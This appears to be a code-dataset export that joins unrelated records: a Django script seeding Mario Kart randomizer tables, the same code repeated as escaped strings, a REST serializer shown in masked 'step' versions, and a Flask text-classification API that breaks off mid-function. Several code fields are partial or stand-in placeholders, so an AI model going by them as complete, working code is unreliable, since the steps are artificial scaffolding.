'https://static.wikia.nocookie.net/nintendo/images/1/1d/Villager-Boy-1.png/revision/latest?cb=20150419125930&path-prefix=en',
'https://i.pinimg.com/originals/bb/ca/f7/bbcaf749d9dc2d1b1259e8fe5cb49769.png',
'https://static.wikia.nocookie.net/nintendo-univers/images/a/a9/Marie_ACAF_3.png/revision/latest?cb=20161221163100&path-prefix=fr',
]
car_names = [
'Standard Kart',
'Pipe Frame',
'Mach 8',
'Steel Driver',
'Cat Cruiser',
'Circuit Special',
'Tri-Speeder',
'Badwagon',
'Prancer',
'Biddybuggy',
'Landship',
'Sneeker',
'Sports Coupe',
'Gold Standard',
'GLA',
'W 25 Silver Arrow',
'300 SL Roadster',
'Blue Falcon',
'Tanooki Kart',
'B Dasher',
'Streetle',
'P-Wing',
'Koopa Clown',
'Standard Bike',
'Comet',
'Sport Bike',
'The Duke',
'Flame Rider',
'Varmint',
'Mr. Scooty',
'Jet Bike',
'Yoshi Bike',
'Master Cycle',
'Master Cycle Zero',
'City Tripper',
'Standard ATV',
'Wild Wiggler',
'Teddy Buggy',
'Bone Rattler',
'Splat Buggy',
'Inkstriker',
]
car_urls = [
'https://static.wikia.nocookie.net/mariokart/images/0/05/StandardKartBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20140715154926',
'https://static.wikia.nocookie.net/mariokart/images/d/d1/PipeFrameBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122932',
'https://static.wikia.nocookie.net/mariokart/images/d/df/Mach8BodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122956',
'https://static.wikia.nocookie.net/mariokart/images/9/94/Steel_Driver.png/revision/latest/scale-to-width-down/100?cb=20200925190921',
'https://static.wikia.nocookie.net/mariokart/images/f/f4/CatCruiserBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123132',
'https://static.wikia.nocookie.net/mariokart/images/6/6c/CircuitSpecialBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123237',
'https://static.wikia.nocookie.net/mariokart/images/5/56/TrispeederBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123217',
'https://static.wikia.nocookie.net/mariokart/images/c/c2/BadwagonBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123350',
'https://static.wikia.nocookie.net/mariokart/images/f/ff/PrancerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123333',
'https://static.wikia.nocookie.net/mariokart/images/4/45/BiddybuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123322',
'https://static.wikia.nocookie.net/mariokart/images/6/6d/LandshipBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123656',
'https://static.wikia.nocookie.net/mariokart/images/4/47/SneakerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123617',
'https://static.wikia.nocookie.net/mariokart/images/f/f8/SportsCoupeMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123625',
'https://static.wikia.nocookie.net/mariokart/images/3/31/MK8Gold_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102123637',
'https://static.wikia.nocookie.net/mariokart/images/c/c2/GLA-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140333',
'https://static.wikia.nocookie.net/mariokart/images/2/25/W25SilverArrow-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332',
'https://static.wikia.nocookie.net/mariokart/images/1/17/300SLRoadster-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332',
'https://static.wikia.nocookie.net/mariokart/images/e/ed/MK8_BlueFalcon.png/revision/latest/scale-to-width-down/100?cb=20150331235059',
'https://static.wikia.nocookie.net/mariokart/images/d/d7/MK8_TanookiBuggy.png/revision/latest/scale-to-width-down/100?cb=20150331235545',
'https://static.wikia.nocookie.net/mariokart/images/3/32/MK8_BDasher.png/revision/latest/scale-to-width-down/100?cb=20150401000836',
'https://static.wikia.nocookie.net/mariokart/images/c/cf/MK8Streetle.png/revision/latest/scale-to-width-down/100?cb=20150426174005',
'https://static.wikia.nocookie.net/mariokart/images/c/cd/MK8PWing.png/revision/latest/scale-to-width-down/100?cb=20150426174107',
'https://static.wikia.nocookie.net/mariokart/images/7/70/MK8DX_Koopa_Clown.png/revision/latest/scale-to-width-down/100?cb=20170704061052',
'https://static.wikia.nocookie.net/mariokart/images/8/84/StandardBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123849',
'https://static.wikia.nocookie.net/mariokart/images/0/0e/CometBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124024',
'https://static.wikia.nocookie.net/mariokart/images/f/fe/SportBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123857',
'https://static.wikia.nocookie.net/mariokart/images/8/8a/TheDukeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925174819',
'https://static.wikia.nocookie.net/mariokart/images/3/31/FlameRiderBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123942',
'https://static.wikia.nocookie.net/mariokart/images/d/d0/VarmintBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123951',
'https://static.wikia.nocookie.net/mariokart/images/1/18/MrScootyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123925',
'https://static.wikia.nocookie.net/mariokart/images/1/12/JetBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123928',
'https://static.wikia.nocookie.net/mariokart/images/6/62/YoshiBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925193256',
'https://static.wikia.nocookie.net/mariokart/images/5/52/MK8_MasterCycle.png/revision/latest/scale-to-width-down/100?cb=20150331231734',
'https://static.wikia.nocookie.net/mariokart/images/3/3e/150px-MK8D_Master_Cycle_Zero.png/revision/latest/scale-to-width-down/111?cb=20200726154936',
'https://static.wikia.nocookie.net/mariokart/images/9/90/MK8CityTripper.png/revision/latest/scale-to-width-down/100?cb=20150426175601',
'https://static.wikia.nocookie.net/mariokart/images/2/23/StandardATVBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124111',
'https://static.wikia.nocookie.net/mariokart/images/a/aa/WildWigglerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925175122',
'https://static.wikia.nocookie.net/mariokart/images/f/fa/TeddyBuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124120',
'https://static.wikia.nocookie.net/mariokart/images/0/0a/MK8BoneRattler.png/revision/latest/scale-to-width-down/100?cb=20150426180108',
'https://static.wikia.nocookie.net/mariokart/images/6/63/MK8DX_Splat_Buggy.png/revision/latest/scale-to-width-down/100?cb=20170706064814',
'https://static.wikia.nocookie.net/mariokart/images/e/eb/MK8DX_Inkstriker.png/revision/latest/scale-to-width-down/100?cb=20170706065507',
]
tire_names = [
'Standard',
'Monster',
'Roller',
'Slim',
'Slick',
'Metal',
'Button',
'Off-Road',
'Sponge',
'Wood',
'Cushion',
'Blue Standard',
'Hot Monster',
'Azure Roller',
'Crimson Slim',
'Cyber Slick',
'Retro Off-Road',
'Gold Tires',
'GLA Tires',
'Triforce Tires',
'Ancient Tyres',
'Leaf Tires',
]
tire_urls = [
'https://static.wikia.nocookie.net/mariokart/images/a/a8/StandardTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125545',
'https://static.wikia.nocookie.net/mariokart/images/2/29/MonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125541',
'https://static.wikia.nocookie.net/mariokart/images/7/76/RollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125539',
'https://static.wikia.nocookie.net/mariokart/images/f/f8/SlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125536',
'https://static.wikia.nocookie.net/mariokart/images/d/dd/SlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125542',
'https://static.wikia.nocookie.net/mariokart/images/9/96/MetalTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124533',
'https://static.wikia.nocookie.net/mariokart/images/0/07/ButtonTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124541',
'https://static.wikia.nocookie.net/mariokart/images/2/25/Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102124559',
'https://static.wikia.nocookie.net/mariokart/images/4/4c/SpongeTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124549',
'https://static.wikia.nocookie.net/mariokart/images/0/03/WoodTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124724',
'https://static.wikia.nocookie.net/mariokart/images/9/92/CushionTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124817',
'https://static.wikia.nocookie.net/mariokart/images/d/db/Blue_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102124836',
'https://static.wikia.nocookie.net/mariokart/images/d/d1/HotMonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124834',
'https://static.wikia.nocookie.net/mariokart/images/f/fe/AzureRollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20200726154338',
'https://static.wikia.nocookie.net/mariokart/images/7/71/CrimsonSlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125627',
'https://static.wikia.nocookie.net/mariokart/images/2/29/CyberSlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125626',
'https://static.wikia.nocookie.net/mariokart/images/4/48/Retro_Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102125629',
'https://static.wikia.nocookie.net/mariokart/images/5/52/Gold_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20141102125630',
'https://static.wikia.nocookie.net/mariokart/images/b/ba/GLATires-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180539',
'https://static.wikia.nocookie.net/mariokart/images/0/09/MK8_TriforceTires.png/revision/latest/scale-to-width-down/100?cb=20150331233357',
'https://static.wikia.nocookie.net/mariokart/images/d/d5/MK8D_Ancient_Tires.png/revision/latest/scale-to-width-down/100?cb=20200726154442',
'https://static.wikia.nocookie.net/mariokart/images/f/f9/Leaf_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180810',
]
glider_names = [
'Super Glider',
'Cloud Glider',
'Wario Wing',
'Waddle Wing',
'Peach Parasol',
'Parachute',
'Parafoil',
'Flower Glider',
'Bowser Kite',
'Plane Glider',
'MKTV Parafoil',
'Gold Glider',
'Hylian Kite',
'Paraglider',
'Paper Glider',
]
glider_urls = [
'https://static.wikia.nocookie.net/mariokart/images/a/a8/SuperGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125815',
'https://static.wikia.nocookie.net/mariokart/images/8/84/Cloud_Glider.png/revision/latest/scale-to-width-down/100?cb=20141102125838',
'https://static.wikia.nocookie.net/mariokart/images/a/ae/WarioWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125853',
'https://static.wikia.nocookie.net/mariokart/images/e/ef/WaddleWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125901',
'https://static.wikia.nocookie.net/mariokart/images/6/6e/PeachParasolGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125940',
'https://static.wikia.nocookie.net/mariokart/images/d/dd/ParachuteGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125823',
'https://static.wikia.nocookie.net/mariokart/images/c/c4/ParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125830',
'https://static.wikia.nocookie.net/mariokart/images/b/b3/FlowerGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125846',
'https://static.wikia.nocookie.net/mariokart/images/f/f7/BowserKiteMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125909',
'https://static.wikia.nocookie.net/mariokart/images/c/ca/PlaneGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125930',
'https://static.wikia.nocookie.net/mariokart/images/9/96/MKTVParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125947',
'https://static.wikia.nocookie.net/mariokart/images/1/18/GoldGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125956',
'https://static.wikia.nocookie.net/mariokart/images/6/62/MK8_HylianKite.png/revision/latest/scale-to-width-down/100?cb=20150331232731',
'https://static.wikia.nocookie.net/mariokart/images/3/39/MK8D_Paraglider.png/revision/latest/scale-to-width-down/117?cb=20200726155246',
'https://static.wikia.nocookie.net/mariokart/images/0/0e/PaperGliderIcon-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426181313',
]
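# Optional sanity check (not in the original script): each *_names list must be
# the same length as its matching *_urls list, otherwise the positional lookups
# in the seeding loops below would raise IndexError partway through.
for names, urls in ((char_names, char_urls), (car_names, car_urls),
                    (tire_names, tire_urls), (glider_names, glider_urls)):
    assert len(names) == len(urls), f'{len(names)} names vs {len(urls)} urls'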
# Seed the Character table. Alternate-colour Yoshi/Shyguy entries and the
# "(G)" variants are stored with index=None so they do not consume a slot in
# the selectable ordering; `skipped` counts how many have been excluded so far.
skipped = 0
for pos, name in enumerate(char_names):
    index = pos - skipped + 1
    if "Yoshi (" in name or "Shyguy (" in name or "(G)" in name:
        skipped += 1
        index = None
    new_char = Character(name=name, image_url=char_urls[pos], index=index)
    new_char.save()

# Seed the Tire, Vehicle, and Glider tables; rows are indexed 1..N in list order.
for pos, name in enumerate(tire_names):
    Tire(name=name, image_url=tire_urls[pos], index=pos + 1).save()

for pos, name in enumerate(car_names):
    Vehicle(name=name, image_url=car_urls[pos], index=pos + 1).save()

for pos, name in enumerate(glider_names):
    Glider(name=name, image_url=glider_urls[pos], index=pos + 1).save()
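# --- Illustrative sketch (not part of the original script) ------------------
# The seeded tables are presumably meant to drive random loadout picks (the
# settings module is 'mkrandom.settings'). Assuming that intent, one random
# row per table can be drawn with Django's standard order_by('?'):
from main.models import Character, Vehicle, Tire, Glider  # already imported at the top of this script

def random_loadout():
    """Return one randomly chosen row from each seeded table."""
    return {
        'character': Character.objects.order_by('?').first(),
        'vehicle': Vehicle.objects.order_by('?').first(),
        'tire': Tire.objects.order_by('?').first(),
        'glider': Glider.objects.order_by('?').first(),
    }

# Example usage:
# for slot, obj in random_loadout().items():
#     print(slot, obj.name if obj else None)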
'https://static.wikia.nocookie.net/mariokart/images/e/ed/MK8_BlueFalcon.png/revision/latest/scale-to-width-down/100?cb=20150331235059',\n 'https://static.wikia.nocookie.net/mariokart/images/d/d7/MK8_TanookiBuggy.png/revision/latest/scale-to-width-down/100?cb=20150331235545',\n 'https://static.wikia.nocookie.net/mariokart/images/3/32/MK8_BDasher.png/revision/latest/scale-to-width-down/100?cb=20150401000836',\n 'https://static.wikia.nocookie.net/mariokart/images/c/cf/MK8Streetle.png/revision/latest/scale-to-width-down/100?cb=20150426174005',\n 'https://static.wikia.nocookie.net/mariokart/images/c/cd/MK8PWing.png/revision/latest/scale-to-width-down/100?cb=20150426174107',\n 'https://static.wikia.nocookie.net/mariokart/images/7/70/MK8DX_Koopa_Clown.png/revision/latest/scale-to-width-down/100?cb=20170704061052',\n 'https://static.wikia.nocookie.net/mariokart/images/8/84/StandardBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123849',\n 'https://static.wikia.nocookie.net/mariokart/images/0/0e/CometBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124024',\n 'https://static.wikia.nocookie.net/mariokart/images/f/fe/SportBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123857',\n 'https://static.wikia.nocookie.net/mariokart/images/8/8a/TheDukeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925174819',\n 'https://static.wikia.nocookie.net/mariokart/images/3/31/FlameRiderBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123942',\n 'https://static.wikia.nocookie.net/mariokart/images/d/d0/VarmintBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123951',\n 'https://static.wikia.nocookie.net/mariokart/images/1/18/MrScootyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123925',\n 'https://static.wikia.nocookie.net/mariokart/images/1/12/JetBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123928',\n 'https://static.wikia.nocookie.net/mariokart/images/6/62/YoshiBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925193256',\n 'https://static.wikia.nocookie.net/mariokart/images/5/52/MK8_MasterCycle.png/revision/latest/scale-to-width-down/100?cb=20150331231734',\n 'https://static.wikia.nocookie.net/mariokart/images/3/3e/150px-MK8D_Master_Cycle_Zero.png/revision/latest/scale-to-width-down/111?cb=20200726154936',\n 'https://static.wikia.nocookie.net/mariokart/images/9/90/MK8CityTripper.png/revision/latest/scale-to-width-down/100?cb=20150426175601',\n 'https://static.wikia.nocookie.net/mariokart/images/2/23/StandardATVBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124111',\n 'https://static.wikia.nocookie.net/mariokart/images/a/aa/WildWigglerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925175122',\n 'https://static.wikia.nocookie.net/mariokart/images/f/fa/TeddyBuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124120',\n 'https://static.wikia.nocookie.net/mariokart/images/0/0a/MK8BoneRattler.png/revision/latest/scale-to-width-down/100?cb=20150426180108',\n 'https://static.wikia.nocookie.net/mariokart/images/6/63/MK8DX_Splat_Buggy.png/revision/latest/scale-to-width-down/100?cb=20170706064814',\n 'https://static.wikia.nocookie.net/mariokart/images/e/eb/MK8DX_Inkstriker.png/revision/latest/scale-to-width-down/100?cb=20170706065507',\n]\n\ntire_names = [\n 'Standard',\n 'Monster',\n 'Roller',\n 'Slim',\n 'Slick',\n 'Metal',\n 'Button',\n 'Off-Road',\n 'Sponge',\n 'Wood',\n 'Cushion',\n 'Blue Standard',\n 'Hot Monster',\n 'Azure Roller',\n 
'Crimson Slim',\n 'Cyber Slick',\n 'Retro Off-Road',\n 'Gold Tires',\n 'GLA Tires',\n 'Triforce Tires',\n 'Ancient Tyres',\n 'Leaf Tires',\n]\n\ntire_urls = [\n 'https://static.wikia.nocookie.net/mariokart/images/a/a8/StandardTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125545',\n 'https://static.wikia.nocookie.net/mariokart/images/2/29/MonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125541',\n 'https://static.wikia.nocookie.net/mariokart/images/7/76/RollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125539',\n 'https://static.wikia.nocookie.net/mariokart/images/f/f8/SlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125536',\n 'https://static.wikia.nocookie.net/mariokart/images/d/dd/SlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125542',\n 'https://static.wikia.nocookie.net/mariokart/images/9/96/MetalTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124533',\n 'https://static.wikia.nocookie.net/mariokart/images/0/07/ButtonTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124541',\n 'https://static.wikia.nocookie.net/mariokart/images/2/25/Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102124559',\n 'https://static.wikia.nocookie.net/mariokart/images/4/4c/SpongeTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124549',\n 'https://static.wikia.nocookie.net/mariokart/images/0/03/WoodTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124724',\n 'https://static.wikia.nocookie.net/mariokart/images/9/92/CushionTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124817',\n 'https://static.wikia.nocookie.net/mariokart/images/d/db/Blue_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102124836',\n 'https://static.wikia.nocookie.net/mariokart/images/d/d1/HotMonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124834',\n 'https://static.wikia.nocookie.net/mariokart/images/f/fe/AzureRollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20200726154338',\n 'https://static.wikia.nocookie.net/mariokart/images/7/71/CrimsonSlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125627',\n 'https://static.wikia.nocookie.net/mariokart/images/2/29/CyberSlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125626',\n 'https://static.wikia.nocookie.net/mariokart/images/4/48/Retro_Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102125629',\n 'https://static.wikia.nocookie.net/mariokart/images/5/52/Gold_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20141102125630',\n 'https://static.wikia.nocookie.net/mariokart/images/b/ba/GLATires-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180539',\n 'https://static.wikia.nocookie.net/mariokart/images/0/09/MK8_TriforceTires.png/revision/latest/scale-to-width-down/100?cb=20150331233357',\n 'https://static.wikia.nocookie.net/mariokart/images/d/d5/MK8D_Ancient_Tires.png/revision/latest/scale-to-width-down/100?cb=20200726154442',\n 'https://static.wikia.nocookie.net/mariokart/images/f/f9/Leaf_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180810',\n]\n\nglider_names = [\n 'Super Glider',\n 'Cloud Glider',\n 'Wario Wing',\n 'Waddle Wing',\n 'Peach Parasol',\n 'Parachute',\n 'Parafoil',\n 'Flower Glider',\n 'Bowser Kite',\n 'Plane Glider',\n 'MKTV Parafoil',\n 'Gold Glider',\n 'Hylian Kite',\n 'Paraglider',\n 'Paper Glider',\n]\n\nglider_urls = [\n 
'https://static.wikia.nocookie.net/mariokart/images/a/a8/SuperGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125815',\n 'https://static.wikia.nocookie.net/mariokart/images/8/84/Cloud_Glider.png/revision/latest/scale-to-width-down/100?cb=20141102125838',\n 'https://static.wikia.nocookie.net/mariokart/images/a/ae/WarioWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125853',\n 'https://static.wikia.nocookie.net/mariokart/images/e/ef/WaddleWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125901',\n 'https://static.wikia.nocookie.net/mariokart/images/6/6e/PeachParasolGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125940',\n 'https://static.wikia.nocookie.net/mariokart/images/d/dd/ParachuteGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125823',\n 'https://static.wikia.nocookie.net/mariokart/images/c/c4/ParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125830',\n 'https://static.wikia.nocookie.net/mariokart/images/b/b3/FlowerGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125846',\n 'https://static.wikia.nocookie.net/mariokart/images/f/f7/BowserKiteMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125909',\n 'https://static.wikia.nocookie.net/mariokart/images/c/ca/PlaneGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125930',\n 'https://static.wikia.nocookie.net/mariokart/images/9/96/MKTVParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125947',\n 'https://static.wikia.nocookie.net/mariokart/images/1/18/GoldGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125956',\n 'https://static.wikia.nocookie.net/mariokart/images/6/62/MK8_HylianKite.png/revision/latest/scale-to-width-down/100?cb=20150331232731',\n 'https://static.wikia.nocookie.net/mariokart/images/3/39/MK8D_Paraglider.png/revision/latest/scale-to-width-down/117?cb=20200726155246',\n 'https://static.wikia.nocookie.net/mariokart/images/0/0e/PaperGliderIcon-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426181313',\n]\n\n\nx=0\ny=0\nfor char in char_names:\n index=x-y+1\n name = char_names[x]\n if \"Yoshi (\" in name or \"Shyguy (\" in name or \"(G)\" in name:\n y+=1\n index=None\n new_char = Character(name=char_names[x],image_url=char_urls[x],index=index)\n new_char.save()\n x+=1\n\nx=0\nfor tire in tire_names:\n index=x+1\n new_tire = Tire(name=tire_names[x],image_url=tire_urls[x],index=index)\n new_tire.save()\n x+=1\nx=0\nfor car in car_names:\n index=x+1\n new_car = Vehicle(name=car_names[x],image_url=car_urls[x],index=index)\n new_car.save()\n x+=1\nx=0\nfor glider in glider_names:\n index=x+1\n new_glider = Glider(name=glider_names[x],image_url=glider_urls[x],index=index)\n new_glider.save()\n x+=1\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from rest_framework import serializers
from .models import SensorValue
class SensorValueSerializer(serializers.ModelSerializer):
timestamp = serializers.DateTimeField(required=False)
class Meta:
model = SensorValue
fields = ("id", "timestamp", "sensor_type", "value")
|
normal
|
{
"blob_id": "39312ec60c9ef1c9c95cf4206b6d0bbdb0aedf94",
"index": 9042,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass SensorValueSerializer(serializers.ModelSerializer):\n <mask token>\n\n\n class Meta:\n model = SensorValue\n fields = 'id', 'timestamp', 'sensor_type', 'value'\n",
"step-3": "<mask token>\n\n\nclass SensorValueSerializer(serializers.ModelSerializer):\n timestamp = serializers.DateTimeField(required=False)\n\n\n class Meta:\n model = SensorValue\n fields = 'id', 'timestamp', 'sensor_type', 'value'\n",
"step-4": "from rest_framework import serializers\nfrom .models import SensorValue\n\n\nclass SensorValueSerializer(serializers.ModelSerializer):\n timestamp = serializers.DateTimeField(required=False)\n\n\n class Meta:\n model = SensorValue\n fields = 'id', 'timestamp', 'sensor_type', 'value'\n",
"step-5": "from rest_framework import serializers\nfrom .models import SensorValue\n\n\nclass SensorValueSerializer(serializers.ModelSerializer):\n timestamp = serializers.DateTimeField(required=False)\n\n class Meta:\n model = SensorValue\n fields = (\"id\", \"timestamp\", \"sensor_type\", \"value\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# POST API for Red Alert project - NLP and Metalearning components
# Insikt Intelligence S.L. 2019
import pandas as pd
import pickle
from flask import Flask, render_template, request, jsonify
from utilities import load_data, detect_language
from preprocessing import preprocess, Tagger, remove_stopwords
import json
from gensim.models import KeyedVectors
from Embeddings import Embeddings, to_vector_single, to_vector_single_nonzeros
import numpy as np
import os
from analysis import analyze
from probability_terror import probability_terror
from new_terms_no_lang import new_terms
from classifier import classifier
from claslisting import claslisting
from audit import audit
app = Flask(__name__)
emb_dict = {"en": "embedding-EN", "ar": "embedding-AR", "es": "embedding-ES", "ro": "embedding-RO","fr": "embedding-FR"}
@app.route('/vectorize',methods=['POST'])
def make_vectorize():
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request())
else:
#Get the text and the language
try:
lang = data['lang']
except:
try:
lang=detect_language(data['text'])
print(lang)
except:
responses=jsonify("Error in vectorize: language field is missing")
return responses
try:
text = data['text']
except:
responses=jsonify("Error in vectorize: text is missing")
return responses
if lang not in ['en','es','ar','ro','fr']:
responses=jsonify("Language not available. Language must be in ['en','es','ar','ro','fr']")
return responses
#Preprocess the text
print("Vectorize...")
embeddings = Embeddings(emb_dict[lang])
processed_text = preprocess(text)
no_stpw_text = remove_stopwords(processed_text, lang)
        vectorized_tokens = to_vector_single_nonzeros(no_stpw_text, embeddings, len(no_stpw_text))
        # Document vector: the mean of the token embeddings, falling back to a
        # 300-dimensional zero vector when no token had a usable embedding
        if len(vectorized_tokens) > 0:
            vectorized_text = np.mean(vectorized_tokens, axis=0)
        else:
            vectorized_text = np.zeros((300,))
print(vectorized_text)
#Send the response codes
responses = jsonify(vector=vectorized_text.tolist())
responses.status_code = 200
return responses
@app.route('/probability',methods=['POST'])
def make_probability():
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request())
else:
#Get the text,language and classifier
try:
lang = data['lang']
except:
try:
lang=detect_language(data['text'])
print(lang)
except:
responses=jsonify("Error in vectorize: language field is missing")
return responses
try:
text = data['text']
except:
responses=jsonify("Error in probability: text is missing")
return responses
try:
cls = data['classifier']
except:
responses=jsonify("Error in probability: classifier is missing")
return responses
if lang not in ['en','es','ar','ro','fr']:
responses=jsonify("Language not available. Language must be in ['en','es','ar','ro','fr']")
return responses
#Preprocess the text
print("Computing probability of having content related to "+cls)
probability = probability_terror(text,lang,cls)
#Send the response codes
responses = jsonify(probability=probability)
responses.status_code = 200
return responses
@app.route('/analyze',methods=['POST'])
def make_analyze():
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request())
else:
#Get the text and the language
try:
lang = data['lang']
except:
try:
lang=detect_language(data['text'])
print(lang)
except:
responses=jsonify("Error in vectorize: language field is missing")
return responses
try:
text = data['text'] # we assume text is tokenized
except:
responses=jsonify("Error in analyze: text is missing")
return responses
if lang not in ['en','es','ar','ro','fr']:
responses=jsonify( message = "Language not available. Language must be in ['en','es','ar','ro','fr']")
return responses
filename = os.path.join(os.path.dirname(__file__), 'models-registry.json')
registry = load_data(filename)
analysis = analyze(text, lang, registry)
#print(analysis[0])
#Send the response codes
responses = jsonify(concepts=analysis[0],key_ideas=analysis[1],topics=analysis[2])
responses.status_code = 200
return responses
@app.route('/terms',methods=['POST'])
def make_terms():
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request())
else:
texts = data['dataset'] # we assume text is tokenized
#Preprocess the text
print("Suggesting new terms for search...")
terms=new_terms(texts)
#print(terms)
#Send the response codes
responses = jsonify(message="Suggested new terms for search: ",terms= list(terms))
responses.status_code = 200
return responses
@app.route('/sento',methods=['POST'])
def make_sento():
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request())
else:
#Get the text, language and classifier
try:
lang = data['lang']
except:
try:
lang=detect_language(data['text'])
print(lang)
except:
responses=jsonify("Error in vectorize: language field is missing")
return responses
try:
text = data['text']
except:
responses=jsonify("Error in sento: text is missing")
return responses
try:
cls = data['classifier']
except:
responses=jsonify("Error in sento: classifier is missing")
return responses
if lang not in ['en','es','ar','ro','fr']:
